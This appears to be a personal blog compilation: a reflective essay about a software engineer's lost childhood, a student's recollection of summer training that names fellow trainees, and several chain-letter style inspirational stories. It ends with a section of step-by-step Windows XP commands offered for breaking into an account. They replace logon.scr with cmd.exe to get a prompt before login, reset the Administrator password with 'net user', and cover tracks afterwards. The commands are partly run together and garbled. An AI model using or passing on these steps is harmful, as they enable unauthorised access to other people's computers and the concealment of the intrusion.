SOFTWARE ENGINEER

It was raining heavily outside. Dark clouds gathered in the sky and nature was in its ominous best. I took a break from my work and went to the pantry to grab a cup of coffee. I had a sip and went near the window to see the rain pouring down heavily outside the glass structure. I was inside our huge office building, unruffled by even the fierceness of the nature.

Through the heavy transparent glass, I could see a small girl trying to hold on to her umbrella which the wind was snatching away from her. I felt sorry for the girl, and was happy that I was not in a similar pathetic situation. Yes. I take pride for the fact that I am a software engineer.

I have everything which a common man would envy; money, status, respect, you name it I have it. I always wanted to be software professional and here I am, working for one of the best firms in the world. But then, am I really happy? Now, I could see an imprint of my palm on the other glass window, through which I reminisced my past, basked in the warmth of the sun shine.

My childhood was so much of fun. I vividly remember those rainy days, when I hugged my mother tightly during sleeping listening to all the stories told by her. Now, I have a big house here, but then it is just a house, not a home. My parents are pretty far away from me now. I have a cell phone to talk to them everyday, but then I really miss those dinners which I had with my family everyday. I could easily afford to taste all the different cuisines these days, but the best of food there, lack the love and affection which is present in the food prepared by my mother.

I threw a lavish party for my colleagues for my birthday, but then they would never replace the birthdays when my friends secretly brought a cake and at the end, half of the cake would have ended up on my face. The couple of hundred bucks that u save for a long period just to give a treat to your friends in the road side chat shop can never give the pleasure even after spending a few thousand bucks these days.

The scene of me crying and refusing to have dinner on the day when I fought with my best friend came to my mind. Today, he has gone far away from me, taking away my friendship and with it my life, but I am sitting and coding here with a false smile on my face. Everyday I meet new people, but then I long ceased to make a new friend.

It's true that I have a lot of things now. I have a nice bed, but no time to sleep. Lots of money, but no friends to spend it with. The latest designer clothes, but a worn out body . Awards for technical excellence, but no reward for the crave for peaceful ambience. A confident demeanor, but a reluctant and apathetic mind. Full of rain, but no sunshine even in the farthest distance.

Now, I could see the small girl on the road enjoying in the rain with her umbrella firmly in her grip. She might not have all the comforts which I have, but then she has the innocence and fun which I lost a long time back.

I have decided to come out of this false fantasy, even if it is at the expense of losing the tap of the software engineer. I am going to again enjoy my life. I am going to go out in the rain and play with the small kid now. I removed my tie, and went near my computer to shut it down. Just then, I saw a new mail alert in my mail box. I slowly opened outlook and I found a message from my manager with an attachment saying that there was a critical defect in the code and I have to fix it soon. I convinced myself that I am not going to get bogged down again by these pressures and stick to my decision. I ignored the mail and went to the rest room. After a couple of minutes, the software engineer in me came out, his shirt tucked in with the perfect tie knot, sat before the computer, and started typing,

DONT HESITATE

Life is journey of millennia, which knows no destination, except mystery. There"s awesome silence soaring deep down until one fine day some of us realize that we are getting attracted to some beautiful stranger. And all our saved up wishes starts coming out. Our eyes looks brighter in the presence of that beautiful stranger.

We have decided that we want to spend the rest of our life with them and not knowing whether they would be spending it with us or not.

So every one of us are not lucky every time. But we should appreciate the feelings of the other person even we cant reciprocate to them in the similar manner.

"Gravity is not responsible of people to fall in love.. it just happens" and when it does happen don"t wait for the right time to express.. because right time is when your heart beats faster.. If you love someone don"t wait for tomorrow.. or for the other person to make the move..agreed "tomorrow never dies".. but also remember.. "tomorrow never comes . . . "

SUMMER OF 2007

Its been a long time since my last post.thought of jotting down something today.tomorrow i will be back in college after spending a rather long holiday(summer holiday).so let me recollect the happenings of the last 35 days(time span of my holiday).my semester exam ended on the 15th and returned home on 17th(if u are wondering wat happened to the one day in between,i dont actually want to remember that).anyways.it was a HOLIDAY and i was back home.seems like a lot of fun isnt it.but soon i realaized that it was turning out to be a horrific thing.far from enjoying it i was being bored to death.how long can a person survive with nothing to do other than have long sleeping sessions(i never woke earlier than 10 o clock),extended movie sessions(saw as many as 3 to 4 films a day),delightful eating sessions(i always munch onto something) and the online sessions(i never happen to be there wen the bill comes home).my life became aimless and hopeless.then 25th of june arrived.one week of trechery came to an end i supposed.our summer training was due to start that day.i was very happy as i got something worthwhile to spend my time.there we were and i met many old frnds their.the center was CMERI,durgapur.the first day we were given a project(did i just say PROJECT.yes i did.it was a PROJECT and not training).5 of us(DOYEL , NILANJAN , SOUMYADEEP , SOUPARNA and ME)of the same college were given the grand task of designing a web page for them using things like PHP and JAVASCRIPT about which we had no idea before.the task seemed wonderful but we had no idea how to proceed with it.somehow we decided that we wil take a week off andeach of us will decide what to do and how to proceed.actually that was just an excuse for us to start it one week late as we had no idea of it.after 1 week we decided that we will have to do everything in the institute together as staying at home is not helping any more.that was the day(2nd july),when we ultimately strted our project and that was the day i worked the most and found interest in the job.
now let me introduce with a 2nd grp who were given the same job as ours in the same room and they were up to their task from the 1st day itself.their head(better not take HER name) ran an one woman show controlling the other 3 members of her group.there was a boy in the group who was actually the odd one out.anyways i will not waste time by writing the exploits of that group.they finished their project by the 3rd week and were off from our room(except fr that boy,for some rsns unknown). we were also immersed in our project and by this time soumyadeep and nilanjan were making serious developments in our project.THEN there was this 3rd group in that room who were really special.I knew a couple of them earlier(HIMADRI and GOURAV).but I want to name some other members of that group, namely ASTIK,TANUSHREE,PRIYANJALI ,who really made our later part of training a really enjoyable stay.I thank u all for that.we are not of the serious type and like fun and enjoyement but we did not find any right ppl so far to enjoy ourselves with.the 2nd grp was hopeless in that respect.they were too professional but I doubt if it always helps.there must be room for emotions and feelings.room for enjoyment and room to be what u are.we are humans not robot.let me tell u about each of THEM now(THESE ARE COMPLETELY MY CONCLUSIONS AND NOT NECESSARILY THE ABSOLUTE TRUTH.FORGIVE ME ANYONE WHO THINKS I HAVE OFFENDED U).

ASTIK:-this boy is the topper of the CSE department of D.I.A.T.M college.well he also looked like a topper with those thick glasses and a matured look(kaku kaku bolle theek hobe I guess).but he has such a humorous side to him.he always responds very smartly and has a witty answer to everything.he along with HIMADRI took the load to complete their project to develop an anti-virus(can u believe it.i didn’t?????????????).he was once caught in the lens of gaurav’s camera on the wrong foot sharing a rather cozy moment with ARPITA(I wont write anything about her).but other than that he is clean.this boy supposedly ate 10 fish and 13 sweets in a feast in C.M.E.R.I which I missed out.

HIMADRI:-I know himadri since my school days.he is a very good boy.he seems an open book but he has many deeper secrets and many faces.lots of enthusiasm and a grtt programmer. HE is the main success behind their completion of project.but as the saying goes,”behind every successful man there is a woman”,so is the case with himu.so who is thet woman???????I have been forced to supress that name but i may come up with it anyday soon.

GOURAV:-this guy is one interesting character.he probably knew more of our project than he did about his own.actually his work ended in the first few days and he was there chatting with us and just being one spectator and mentally supporting his own team.very funny boy and a net and ORKUT addict.his gatalk caption reads 24hrs online and he urges anyone he sees to add him in ORKUT and make him his fan.(the rsn being he wants to reach the magical figure of 100).he floods his own scraps to increase it.he also managed to bunk one week and go to attend a marriage party to fill his apettite.

TANUSHREE:-well a very one of a kind gal.14 days was too short a period to know her.she is very moody.sharing joke and everything a moment to being angry over some matter and disappear the next.she also took interest in the project and the most wonderful thing that she did was to write the whole documentation part of their project and erase it BY MISTAKE.she has many DADA(bhaiyas) and she has a specifical liking for them.but whom is she linked to is a mystery……….nonetheless a nice gal with a little KAKIMA attitude.

PRIYANJALI:-she didn’t come often but she is someone who is a self acclaimed tomboy.full of life and very sweet.also a part of the team to develop the anti-virus(still cant believe it).not linked to anyone in the grpp but has somehow managed to tell everyone who her crush is(a little prank by GOURAV).i wd like to give her one advice.plzzz change to BROADBAND.dial-up sucks.

So these were the 5 buddies that I met during my training whom I will never forget and who made my time in C.M.E.R.I really a time to remember.i will never forget the pranks we played on each other, the long discussions about how hopeless we are with our projects.I will never forget the way we all pulled each others legs at every possible time.i will never forget the numerous times we went to have coffee just because we wanted to be away frm work.I will never forget the time when myself and gaurav discussed how can a person get paid for doing chatting and writing mails to her boy frnd the whole day.i will never forget anyone of U and I will never forget any single moment spent with u all in yhe SUMMER of 2007.we finished our project a day earlier than theirs and it was very sad that day thinking that this is the end.no more coming here next morning to see them all.no more meeting them.i don’t know what path our lives will take us but I will remember u all and try to maintain contact.hope u all will too.

EPILOUGE:-we ended our web page development and they liked it very much and said that the site will be uploaded within a week.we are keeping our fingers crossed and are happy to manage to do something worthwhile.
The 3rd group finally finished their anti-virus project(I will never believe it.how can they????).they have named it 9-lives and are planning to launch a trial version soon.

ONE WORD OF PRECAUTION:-during the development of their anti-virus,two of the institutes computers have crashed and the computer of HIMADRI is facing a serious problem.so think thrice before trying it.

Welll that’s the end of it and its 26th july now.the end of the holiday which started on a boring note, went through a roller coaster journey of fun and new found frnds and is ending on a nostalgic note.

CHANGE THE WAY U THINK

Two men, both seriously ill, occupied the same hospital room. One man was allowed to sit up in his bed for an hour each afternoon to help drain the fluid from his lungs. His bed was next to the room's only window. The other man had to spend all his time flat on his back. The men talked for hours on end. They spoke of their wives and families, their homes, their jobs, their involvement in themilitary service, where they had been on vacation. Every afternoon when the man in the bed by the window could sit up, he would pass the time by describing to his roommate all the things he could see outside the window. The man in the other bed began to live for those one-hour periods where his world would be broadened and enlivened by all the activity and color of the world outside. The window overlooked a park with a lovely lake. Ducks and swans played on the water while children sailed their model boats. Young lovers walked arm in arm amidst flowers of every color of the rainbow. Grand old trees graced the landscape, and a fine view of the city skyline could be seen in the distance. As the man by the window described all this in exquisite detail, the man on the other side of the room would close his eyes and imagine the picturesque scene. One warm afternoon the man by the window described a parade passing by. Although the other man couldn't hear the band - he could see it. In his mind's eye as the gentleman by the window portrayed it with descriptive words. Days and weeks passed. One morning, the day nurse arrived to bring water for their baths only to find the lifeless body of the man by the window, who had died peacefully in his sleep. She was saddened and called the hospital attendants to take the body away. As soon as it seemed appropriate, the other man asked if he could be moved next to the window. The nurse was happy to make the switch, and after making sure he was comfortable, she left him alone. Slowly, painfully, he propped himself up on one elbow to take his first look at the world outside. Finally, he would have the joy of seeing it for himself. He strained to slowly turn to look out the window beside the bed. It faced a blank wall. The man asked the nurse what could have compelled his deceased roommate who had described such wonderful things outside this window. The nurse responded that the man was blind and could not even see the wall. She said, "Perhaps he just wanted to encourage you."

Epilogue: There is tremendous happiness in making others happy, despite our own situations. Shared grief is half the sorrow, but happiness when shared, is doubled. If you want to feel rich, just count all the things you have that money can't buy. " Today is a gift, that's why it is called the present."

SOMETHING TO THINK OF

A woman came out of her house and saw 3 old men with long white beards sitting in her front yard. She did not recognize them. She said "I don't think I know you, but you must be hungry. Please come in and have something to eat."
"Is the man of the house home?", they asked.
"No", she replied. "He's out."
"Then we cannot come in", they replied.
In the evening when her husband came home, she told him what had happened.
"Go tell them I am home and invite them in!" The woman went out and invited the men in.
"We do not go into a House together," they replied. "Why is that?" she asked.
One of the old men explained: "His name is Wealth," he said pointing to one of his friends, and said pointing to another one, "He is Success, and I am Love." Then he added, "Now go in and discuss with your husband which one of us you want in your home."
The woman went in and told her husband what was said. Her husband was overjoyed. "How nice!!", he said. "Since that is the case, let us invite Wealth. Let him come and fill our home with wealth!"
His wife disagreed. "My dear, why don't we invite Success?"
Their daughter-in-law was listening from the other corner of the house. She jumped in with her own suggestion: "Would it not be better to invite Love? Our home will then be filled with love!"
"Let us heed our daughter-in-law's advice," said the husband to his wife. "Go out and invite Love to be our guest."
The woman went out and asked the 3 old men, "Which one of you is Love? Please come in and be our guest."
Love got up and started walking toward the house. The other 2 also got up and followed him. Surprised, the lady asked Wealth and Success: "I only invited Love, Why are you coming in?"
The old men replied together: "If you had invited Wealth or Success, the other two of us would've stayed out, but since you invited Love, wherever He goes, we go with him. Wherever there is Love, there is also Wealth and Success.....!".
MY WISH FOR YOU...
Where there is pain, I wish you peace and mercy. Where there is self-doubting, I wish you a renewed confidence in your ability to work through it. Where there is tiredness, or exhaustion, I wish you understanding, patience, and renewed strength. Where there is fear, I wish you love, and courage.

You have two choices right now:

2. Invite love by sharing this story with all the people you care about.

THE FEARS THAT MAKE US LEARN

I feared being alone until I learned to like myself. I feared failure until I realized that I only fail when I don't try. I feared success until I realized that I had to try in order to be happy with myself. I feared people's opinions until I learned that people would have opinions about me anyway. I feared rejection until I learned to have faith in myself I feared pain until I learned that it's necessary for growth. I feared the truth until I saw the ugliness in lies. I feared life until I experienced its beauty. I feared death until I realized that it's not an end, but a beginning. I feared my destiny, until I realized that I had the power to change my life. I feared hate until I saw that it was nothing more than ignorance. I feared love until it touched my heart, making the darkness fade into endless sunny day I feared ridicule until I learned how to laugh at myself. I feared growing old until I realized that I gained wisdom every day I feared the future until I realized that life just kept getting better. I feared the past until I realized that it could no longer hurt I feared the dark until I swa the beauty of the starlight. I feared the light until I learned that the truth would give me strength. I feared change, until I saw that even the most beautiful butterfly had to undergo a metamorphosis before it could fly.

UNCONDITIONAL LOVE

A story is told about a soldier who was finally coming home after having fought in Vietnam. He called his parents from San Francisco.
"Mom and Dad, I'm coming home, but I've a favor to ask. I have a friend I'd like to bring home with me."

"Sure," they replied, "we'd love to meet him."

"There's something you should know the son continued, "he was hurt pretty badly in the fighting. He stepped on a land mind and lost an arm and a leg. He has nowhere else to go, and I want him to come live with us."

"I'm sorry to hear that, son. Maybe we can help him find somewhere to live."

"No, Mom and Dad, I want him to live with us."

"Son," said the father, "you don't know what you're asking. Someone with such a handicap would be a terrible burden on us. We have our own lives to live, and we can't let something like this interfere with our lives. I think you should just come home and forget about this guy. He'll find a way to live on his own."

At that point, the son hung up the phone. The parents heard nothing more from him. A few days later, however, they received a call from the San Francisco police. Their son had died after falling from a building, they were told. The police believed it was suicide. The grief-stricken parents flew to San Francisco and were taken to the city morgue to identify the body of their son. They recognized him, but to their horror they also discovered something they didn't know, their son had only one arm and one leg.

The parents in this story are like many of us. We find it easy to love those who are good-looking or fun to have around, but we don't like people who inconvenience us or make us feel uncomfortable. We would rather stay away from people who aren't as healthy, beautiful, or smart as we are. Thankfully, there's someone who won't treat us that way. Someone who loves us with an unconditional love that welcomes us into the forever family, regardless of how messed up we are.

how to hack admin password in windows xp

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ *drops to rootcd\windows\system32 *directs to the system32 dirmkdir temphack *creates the folder temphackcopy logon.scr temphack\logon.scr *backsup logon.scrcopy cmd.exe temphack\cmd.exe *backsup cmd.exedel logon.scr *deletes original logon.scrrename cmd.exe logon.scr *renames cmd.exe to logon.screxit *quits dos
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

or else there is another simple method

so what if u don't know the password of your admin and still want to hack and change .. yea u can do it ..in a very easy manner.. check this. just follow the steps.. this doesn't require u to know the admin password but still u can change it..
Start >> Run >> [type]cmd // this will open your command prompt[type] net(space)user(press enter)[type] net(space)user(space)[windowsloginid](sp ace)*(press enter)
// for e.g. : net user Shaswat *(press enter)
[type] new password (press enter) and retype it (press enter).. it will show u confirmation... // caution it wont show u the password u type.. but it still types.. the blinking pointer will b there at the same place.. but it still works..// for e.g. : password changed successfully.
well.. this is so easy and can b done within seconds.. anyways enjoy
